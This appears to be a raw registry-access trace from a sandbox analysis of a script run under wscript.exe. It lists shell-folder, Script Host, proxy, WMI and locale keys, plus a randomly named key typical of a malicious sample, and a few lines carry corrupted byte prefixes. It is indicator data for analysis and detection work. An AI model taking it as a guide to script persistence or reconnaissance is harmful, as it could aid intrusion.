HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Favorites
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WINMGMTS\CLSID\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
\xec\x88\xa0\xc8\x83EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xec\x88\xa0\xc8\x83EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrlLRLG2Z1SYOAj\(Default)
\xe7\xb1\xa8\xc8\xb1EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrlLRLG2Z1SYOAj\(Default)
\xe7\xb1\xa8\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
\xe7\xbf\x90\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe7\xbc\x90\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnablePrivateObjectHeap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ContextLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ObjectLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6A7AE7C1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
